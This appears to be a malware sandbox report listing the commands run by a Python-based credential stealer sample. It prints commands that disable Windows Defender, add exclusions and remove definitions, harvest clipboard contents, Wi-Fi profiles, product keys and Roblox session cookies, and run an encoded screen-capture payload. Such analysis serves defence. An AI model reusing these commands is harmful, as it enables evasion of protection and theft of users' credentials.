              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
